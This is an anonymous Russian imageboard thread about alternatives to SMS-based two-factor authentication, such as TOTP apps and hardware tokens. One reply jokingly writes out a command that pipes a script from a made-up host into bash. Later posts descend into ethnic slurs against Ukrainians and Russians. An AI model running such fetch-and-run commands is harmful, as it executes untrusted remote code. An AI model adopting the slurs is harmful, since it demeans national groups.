[Ответить в тред] Ответить в тред

02/12/16 - Конкурс визуальных новелл доски /ruvn/
15/11/16 - **НОВЫЙ ФУНКЦИОНАЛ** - Стикеры
09/10/16 - Открыта доска /int/ - International, давайте расскажем о ней!


Новые доски: /2d/ - Аниме/Беседка • /wwe/ - WorldWide Wrestling Universe • /ch/ - Чатики и конфочки • /int/ - International • /ruvn/ - Российские визуальные новеллы • /math/ - Математика • Создай свою

[Назад][Обновить тред][Вниз][Каталог] [ Автообновление ] 35 | 2 | 19
Назад Вниз Каталог Обновить

Двухфакторная аутентификация Аноним (Microsoft Windows 7: Chromium based) # OP  20/11/16 Вск 15:31:47  1891689  
dvuhfaktornaya-[...].jpg (26Кб, 555x305)
Многие сайты и веб-сервисы предлагают использовать двухфакторную аутентификацию (смс), чтобы лучше обезопасить аккаунты пользователей.

С одной стороны это хорошо. Но с другой стороны ты палишь свой номер телефона.

Даже если ты не драгдиллер и прочий криминал, все равно как-то не по себе, что кто-то очень легко сможет вычислить тебя по номеру твоего телефона.

Есть ли другие способы двухфакторной аутентификации на сайтах и сервисах кроме использования смс?

Вроде есть специальные приложения для этого. Или в них тоже задействован номер телефона?
Аноним (Microsoft Windows 7: Chromium based) 20/11/16 Вск 15:42:59  1891702
>>1891689 (OP)
Стим двухфакторится через приложение, например. Но код для первичной привязки всё равно шлёт по смс.
Аноним (Microsoft Windows 7: Firefox based) 20/11/16 Вск 16:14:26  1891740
>>1891689 (OP)
>Есть ли другие способы двухфакторной аутентификации на сайтах и сервисах кроме использования смс?
Есть. Неужели так сложно нагуглить хотя бы базовую информацию?
https://en.wikipedia.org/wiki/Multi-factor_authentication
https://ru.wikipedia.org/wiki/Многофакторная_аутентификация
Есть HOTP/TOTP-токены (отдельные устройства) и приложения для почти любых платформ. Для их работы подключение к сети не нужно.
Пожалуй, наиболее распространённены RFC 6238- и RFC 4226-совместимые, например https://en.wikipedia.org/wiki/Google_Authenticator
Аноним (Microsoft Windows 7: Firefox based) 21/11/16 Пнд 17:47:06  1892707
>>1891689 (OP)
>Есть ли другие способы двухфакторной аутентификации на сайтах и сервисах кроме использования смс?

Купить себе аккаунт и симку в одной из пиздиллиардов компаний с виртуальными симками.

>Многие сайты и веб-сервисы предлагают использовать двухфакторную аутентификацию (смс), чтобы лучше обезопасить аккаунты пользователей.

А это уже полная хуйня, потому что как правило 2f ухудшает безопасность, ежели у тебя там не пароль 123456, а что-то адекватное и не утекшее во все словари.

Просто потому что сама по себе защита gsm и смс - полная хуйня, и есть минимум джва не сильно сложных варианта перехватить смс на твой номер: фемтосота за $600 (что более сложно из-за необходимости физического контакта с целью) или даже SS7 - когда ты можешь хекать людей с другой стороны планеты, прост проведя грамотный OSINT
Аноним (Microsoft Windows 7: Firefox based) 21/11/16 Пнд 18:12:36  1892724
>>1892707
>А это уже полная хуйня, потому что как правило 2f ухудшает безопасность

Надо понимать что в данном случае (смс) речь не идет о 2fa, речь идет о 2sv, потому что в большинстве случаев когда говорят двухфакторная аутентификация, на самом деле имеют ввиду 2sv
Аноним (Microsoft Windows 7: Firefox based) 21/11/16 Пнд 20:01:27  1892821
>>1892724
>не 2fa, а 2sv
Говнофорс воннаби-безопасников. Иди пропробуй найти определение в RFC, ISO, NIST, ГОСТ... да хоть где-то, кроме бложиков напыщенных петухов.
Аноним (Microsoft Windows 7: Chromium based) 21/11/16 Пнд 21:48:15  1892930
>>1891689 (OP)
> Но с другой стороны ты палишь свой номер телефона
А нахуя он ещё нужен, валенок?
Аноним (Linux: Firefox based) 22/11/16 Втр 02:11:48  1893143
>>1892707
> А это уже полная хуйня, потому что как правило 2f ухудшает безопасность
> защита gsm

Мамкины ибэшники в тредже. Все за IDS!

Есть много разных конечных реализаций двухфакторной аутентификации. То, что какие-то сервисы выбирают SMS, не делает SMS исключительным и единственным методом.

2G, который действительно «ломается» уже практически при помощи [CODE]curl http://2ghaxxorz.io/install.sh | bash[/CODE], стремительно выключается операторами, и после 2018-2019 он останется только у самых слоупочных и/или недоразвитых стран мира. А, ну и ещё у Свисском, который почему-то считает, что 2G очень нужен людям аж до 2021, что делает его отдельной категорией самого по себе.
Аноним (Microsoft Windows 7: Firefox based) 22/11/16 Втр 02:44:00  1893162
>>1893143
>[CODE]
С разморозкой, олдфаг. Как там в 2011?
Аноним (Linux: Firefox based) 22/11/16 Втр 02:54:18  1893165
>>1893162
Ну так, потихоньку. Японии помогаем, бин Ладена хороним, тэг CODE используем. А вы тут как? На Марс, поди, летаете?
Аноним (Microsoft Windows 7: Chromium based) 22/11/16 Втр 07:19:45  1893231
>>1893165
В контактике с планшетика сидим))) Абу позвал нас на модный двачик)))) Теперь это наш сайт, а унылых олдфагов-задротов мы отсюда выперли)))))
Аноним (Google Android: Mobile Safari) 22/11/16 Втр 08:20:48  1893246
>>1892707
Да бля, школьник-кулхацкер Вася будет покупать спец оборудования на пару тысяч долларов чтобы перехватить мой жсм сигнал и получить доступ к моему стиму/гогу. Что еще расскажешь?
Аноним (Microsoft Windows 10: New Opera) 22/11/16 Втр 11:18:49  1893336
>>1893165
>Японии помогаем
>А вы тут как?
Ты не поверишь, но тут в Японии опять Фукусима пиздецом накрывается, лол.
>>1893246
Вася не будет, но вот как МТС сливала смс с кодом восстановления аккаунта Телеграмма http://mts-slil.info, вот от этого хотелось бы как-то обезопаситься. Хотя я тоже просто грязь из-под ногтей.
Аноним (Linux: Firefox based) 22/11/16 Втр 12:10:02  1893384
Вот этот вот >>1891740 все сказал. Сейчас даже вконтактик поддерживает google autenticator, на другие ОС куча аналогов. Программу на телефон, на телефон 32х значный пароль и все збс.
Аноним (Microsoft Windows 7: Chromium based) 22/11/16 Втр 18:05:52  1893720
>>1893384

>на телефон 32х значный пароль и все збс.

То есть при каждой авторизации на каком-нибудь сайте надо будет вводить 32х значный пароль на телефоне?
Аноним (Google Android: Mobile Safari) 22/11/16 Втр 19:05:44  1893758
>>1893720
да хоть трёхсимвольный
Аноним (Google Android: Mobile Safari) 22/11/16 Втр 23:20:05  1893985
>>1893720
LastPass
Аноним (Microsoft Windows 7: Chromium based) 23/11/16 Срд 07:15:18  1894268
>>1893336
Албуров. Козловский. Кто все эти люди?
Аноним (Microsoft Windows 7: Chromium based) 23/11/16 Срд 07:52:02  1894275
>>1893985
Нахуя тебе 32 символа если ты ставишь мокропиську?))
Аноним (Microsoft Windows 10: New Opera) 23/11/16 Срд 09:22:31  1894285
>>1894268
Граждане Российской Федерации, чьи права нарушила Российская Федерация. Достаточно?
Аноним (Google Android: Mobile Safari) 23/11/16 Срд 17:00:23  1894572
>>1894275
>LastPass
>Мокрописька
Ох уж эти спермосвыни. А Гугл это васяны, трелло васяноподелка, а гитхаб - васянское говно. Что еще расскажешь?
Аноним (Microsoft Windows 7: Firefox based) 23/11/16 Срд 17:14:46  1894582
>>1894572
Не, это просто петушиные сервисы и программы.
Аноним (Google Android: Mobile Safari) 23/11/16 Срд 17:19:10  1894586
>>1894582
Эталонное какло. Ну или просто школьник с играми.
Гугол то всьо ГАВНО тоти руськи дибилы роблять тути кончени руськи бухавуть йой а виндовс вун хороший ты шо дибил чы шо.
Аноним (Microsoft Windows 7: Firefox based) 23/11/16 Срд 17:46:16  1894609
>>1894586
>Эталонное какло. Ну или просто школьник с играми.
Ещё предположения? Я тебе даже подсказку дам:
>виндовс вун хороший
Нет, такое же говно для петухов.
Аноним (Microsoft Windows 8: Chromium based) 23/11/16 Срд 17:51:29  1894611
>>1894586
>Гугол то всьо ГАВНО тоти руськи дибилы роблять тути кончени руськи бухавуть йой а виндовс вун хороший ты шо дибил чы шо.
Ничоси! Лингвистический даун с /po/раши!
Аноним (Google Android: Mobile Safari) 23/11/16 Срд 18:22:20  1894653
>>1894609
>>1894611
>Хаха ты русак конченый бухый вы туй росии вси бухаете кончени руськи дибилы роблять тути кончени приколы про нас
Хуя свынопитеку печет, уже семенит
Аноним (Microsoft Windows 7: Firefox based) 23/11/16 Срд 19:05:01  1894703
>>1894653
Спермохохол, хватит реверсить, пользователь петушиных анальных сервисов здесь только ты.
Аноним (Google Android: Mobile Safari) 23/11/16 Срд 19:36:11  1894747
>>1894703
>Йой та назвав конченый бухый руськый баран назвав мынэ хохлом йой та то всьо вун сам тот спермохохол
Хуя свыня проецирует
Аноним (Microsoft Windows 7: Firefox based) 23/11/16 Срд 19:48:11  1894751
>>1894747
Спермохохол, говори по-русски, я ни слова не понял из твоего визга.
Аноним (Linux: Firefox based) 23/11/16 Срд 20:10:33  1894772
>>1893231
> а унылых олдфагов-задротов мы отсюда выперли)))))

(((((
Аноним (Linux: Firefox based) 23/11/16 Срд 20:14:08  1894776
.jpg (23Кб, 480x360)
>>1893336
> Ты не поверишь, но тут в Японии опять Фукусима пиздецом накрывается, лол.

Что, опять?
Аноним (Microsoft Windows 7: Firefox based) 23/11/16 Срд 20:37:20  1894803
>>1891689 (OP)
>Но с другой стороны ты палишь свой номер телефона.
О БОЖИ МИНЯ ВЫЧЕСЛЯТ И ПСАДЯТ ТОЛКО НИ ЗАНЮ ЗАШТО!!!1!!!

>>1891689 (OP)
>Даже если ты не драгдиллер и прочий криминал
>Даже
Даже? Я думал это борда для организованной преступности, а не для сычей, которые боятся на улицу выйти. Буду знать.

Аноним (Microsoft Windows 7: Firefox based) 23/11/16 Срд 20:40:03  1894805
>>1892707
>потому что как правило 2f ухудшает безопасность
Ебать, вот это аналитик.

>>1892707
>фемтосота за $600 (что более сложно из-за необходимости физического контакта с целью) или даже SS7 - когда ты можешь хекать людей с другой стороны планеты, прост проведя грамотный OSINT
Вот это охренеть! Фсе, атказываюсь от двухфакторной аутентификации, ато ероха миня взломает((((
Аноним (Google Android: Mobile Safari) 23/11/16 Срд 21:37:58  1894834
>>1894751
Хуя свыне печет
Аноним (Microsoft Windows 7: Firefox based) 23/11/16 Срд 21:43:21  1894836
>>1894834
Свыня, почему тебе печёт?
Аноним (Google Android: Mobile Safari) 23/11/16 Срд 22:38:17  1894903
>>1894836
>Обзываешьнаминяпириводишьнасебя
Ох уж эта свыня

[Назад][Обновить тред][Вверх][Каталог] [Реквест разбана] [Подписаться на тред] [ ] 35 | 2 | 19
Назад Вверх Каталог Обновить

Топ тредов
Избранное